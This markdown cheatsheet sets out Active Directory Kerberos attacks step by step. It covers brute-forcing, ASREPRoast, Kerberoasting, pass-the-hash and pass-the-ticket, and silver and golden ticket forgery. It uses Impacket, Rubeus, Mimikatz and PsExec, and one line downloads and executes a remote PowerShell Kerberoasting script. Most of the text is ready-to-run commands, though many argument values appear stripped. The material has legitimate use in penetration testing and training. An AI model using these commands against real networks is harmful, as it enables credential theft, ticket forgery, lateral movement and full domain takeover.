# Kerberos cheatsheet ## Bruteforcing With [kerbrute.py](https://github.com/TarlogicSecurity/kerbrute): ```shell python kerbrute.py -domain -users -passwords -outputfile ``` With [Rubeus](https://github.com/Zer1t0/Rubeus) version with brute module: ```shell # with a list of users .\Rubeus.exe brute /users: /passwords: /domain: /outfile: # check passwords for all users in current domain .\Rubeus.exe brute /passwords: /outfile: ``` ## ASREPRoast With [Impacket](https://github.com/SecureAuthCorp/impacket) example GetNPUsers.py: ```shell # check ASREPRoast for all domain users (credentials required) python GetNPUsers.py /: -request -format -outputfile # check ASREPRoast for a list of users (no credentials required) python GetNPUsers.py / -usersfile -format -outputfile ``` With [Rubeus](https://github.com/GhostPack/Rubeus): ```shell # check ASREPRoast for all users in current domain .\Rubeus.exe asreproast /format: /outfile: ``` Cracking with dictionary of passwords: ```shell hashcat -m 18200 -a 0 john --wordlist= ``` ## Kerberoasting With [Impacket](https://github.com/SecureAuthCorp/impacket) example GetUserSPNs.py: ```shell python GetUserSPNs.py /: -outputfile ``` With [Rubeus](https://github.com/GhostPack/Rubeus): ```shell .\Rubeus.exe kerberoast /outfile: ``` With **Powershell**: ``` iex (new-object Net.WebClient).DownloadString("https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1") Invoke-Kerberoast -OutputFormat | % { $_.Hash } | Out-File -Encoding ASCII ``` Cracking with dictionary of passwords: ```shell hashcat -m 13100 --force john --format=krb5tgs --wordlist= ``` ## Overpass The Hash/Pass The Key (PTK) By using [Impacket](https://github.com/SecureAuthCorp/impacket) examples: ```shell # Request the TGT with hash python getTGT.py / -hashes [lm_hash]: # Request the TGT with aesKey (more secure encryption, probably more stealth due is the used by default by Microsoft) python getTGT.py / -aesKey # Request the TGT with password python getTGT.py /:[password] # If not provided, password is asked # Set the TGT for impacket use export KRB5CCNAME= # Execute remote commands with any of the following by using the TGT python psexec.py /@ -k -no-pass python smbexec.py /@ -k -no-pass python wmiexec.py /@ -k -no-pass ``` With [Rubeus](https://github.com/GhostPack/Rubeus) and [PsExec](https://docs.microsoft.com/en-us/sysinternals/downloads/psexec): ```shell # Ask and inject the ticket .\Rubeus.exe asktgt /domain: /user: /rc4: /ptt # Execute a cmd in the remote machine .\PsExec.exe -accepteula \\ cmd ``` ## Pass The Ticket (PTT) ### Harvest tickets from Linux Check type and location of tickets: ```shell grep default_ccache_name /etc/krb5.conf ``` If none return, default is FILE:/tmp/krb5cc_%{uid}. In case of file tickets, you can copy-paste (if you have permissions) for use them. In case of being *KEYRING* tickets, you can use [tickey](https://github.com/TarlogicSecurity/tickey) to get them: ```shell # To dump current user tickets, if root, try to dump them all by injecting in other user processes # to inject, copy tickey in a reachable folder by all users cp tickey /tmp/tickey /tmp/tickey -i ``` ### Harvest tickets from Windows With [Mimikatz](https://github.com/gentilkiwi/mimikatz): ```shell mimikatz # sekurlsa::tickets /export ``` With [Rubeus](https://github.com/GhostPack/Rubeus) in Powershell: ```shell .\Rubeus dump # After dump with Rubeus tickets in base64, to write the in a file [IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("")) ``` To convert tickets between Linux/Windows format with [ticket_converter.py](https://github.com/Zer1t0/ticket_converter): ``` python ticket_converter.py ticket.kirbi ticket.ccache python ticket_converter.py ticket.ccache ticket.kirbi ``` ### Using ticket in Linux: With [Impacket](https://github.com/SecureAuthCorp/impacket) examples: ```shell # Set the ticket for impacket use export KRB5CCNAME= # Execute remote commands with any of the following by using the TGT python psexec.py /@ -k -no-pass python smbexec.py /@ -k -no-pass python wmiexec.py /@ -k -no-pass ``` ### Using ticket in Windows Inject ticket with [Mimikatz](https://github.com/gentilkiwi/mimikatz): ```shell mimikatz # kerberos::ptt ``` Inject ticket with [Rubeus](https://github.com/GhostPack/Rubeus): ```shell .\Rubeus.exe ptt /ticket: ``` Execute a cmd in the remote machine with [PsExec](https://docs.microsoft.com/en-us/sysinternals/downloads/psexec): ```shell .\PsExec.exe -accepteula \\ cmd ``` ## Silver ticket With [Impacket](https://github.com/SecureAuthCorp/impacket) examples: ```shell # To generate the TGS with NTLM python ticketer.py -nthash -domain-sid -domain -spn # To generate the TGS with AES key python ticketer.py -aesKey -domain-sid -domain -spn # Set the ticket for impacket use export KRB5CCNAME= # Execute remote commands with any of the following by using the TGT python psexec.py /@ -k -no-pass python smbexec.py /@ -k -no-pass python wmiexec.py /@ -k -no-pass ``` With [Mimikatz](https://github.com/gentilkiwi/mimikatz): ```shell # To generate the TGS with NTLM mimikatz # kerberos::golden /domain:/sid: /rc4: /user: /service: /target: # To generate the TGS with AES 128 key mimikatz # kerberos::golden /domain:/sid: /aes128: /user: /service: /target: # To generate the TGS with AES 256 key (more secure encryption, probably more stealth due is the used by default by Microsoft) mimikatz # kerberos::golden /domain:/sid: /aes256: /user: /service: /target: # Inject TGS with Mimikatz mimikatz # kerberos::ptt ``` Inject ticket with [Rubeus](https://github.com/GhostPack/Rubeus): ```shell .\Rubeus.exe ptt /ticket: ``` Execute a cmd in the remote machine with [PsExec](https://docs.microsoft.com/en-us/sysinternals/downloads/psexec): ```shell .\PsExec.exe -accepteula \\ cmd ``` ## Golden ticket With [Impacket](https://github.com/SecureAuthCorp/impacket) examples: ```shell # To generate the TGT with NTLM python ticketer.py -nthash -domain-sid -domain # To generate the TGT with AES key python ticketer.py -aesKey -domain-sid -domain # Set the ticket for impacket use export KRB5CCNAME= # Execute remote commands with any of the following by using the TGT python psexec.py /@ -k -no-pass python smbexec.py /@ -k -no-pass python wmiexec.py /@ -k -no-pass ``` With [Mimikatz](https://github.com/gentilkiwi/mimikatz): ```shell # To generate the TGT with NTLM mimikatz # kerberos::golden /domain:/sid: /rc4: /user: # To generate the TGT with AES 128 key mimikatz # kerberos::golden /domain:/sid: /aes128: /user: # To generate the TGT with AES 256 key (more secure encryption, probably more stealth due is the used by default by Microsoft) mimikatz # kerberos::golden /domain:/sid: /aes256: /user: # Inject TGT with Mimikatz mimikatz # kerberos::ptt ``` Inject ticket with [Rubeus](https://github.com/GhostPack/Rubeus): ```shell .\Rubeus.exe ptt /ticket: ``` Execute a cmd in the remote machine with [PsExec](https://docs.microsoft.com/en-us/sysinternals/downloads/psexec): ```shell .\PsExec.exe -accepteula \\ cmd ``` ## Misc To get NTLM from password: ```python python -c 'import hashlib,binascii; print binascii.hexlify(hashlib.new("md4", "".encode("utf-16le")).digest())' ``` ## Tools * [Impacket](https://github.com/SecureAuthCorp/impacket) * [Mimikatz](https://github.com/gentilkiwi/mimikatz) * [Rubeus](https://github.com/GhostPack/Rubeus) * [Rubeus](https://github.com/Zer1t0/Rubeus) with brute module * [PsExec](https://docs.microsoft.com/en-us/sysinternals/downloads/psexec) * [kerbrute.py](https://github.com/TarlogicSecurity/kerbrute) * [tickey](https://github.com/TarlogicSecurity/tickey) * [ticket_converter.py](https://github.com/Zer1t0/ticket_converter)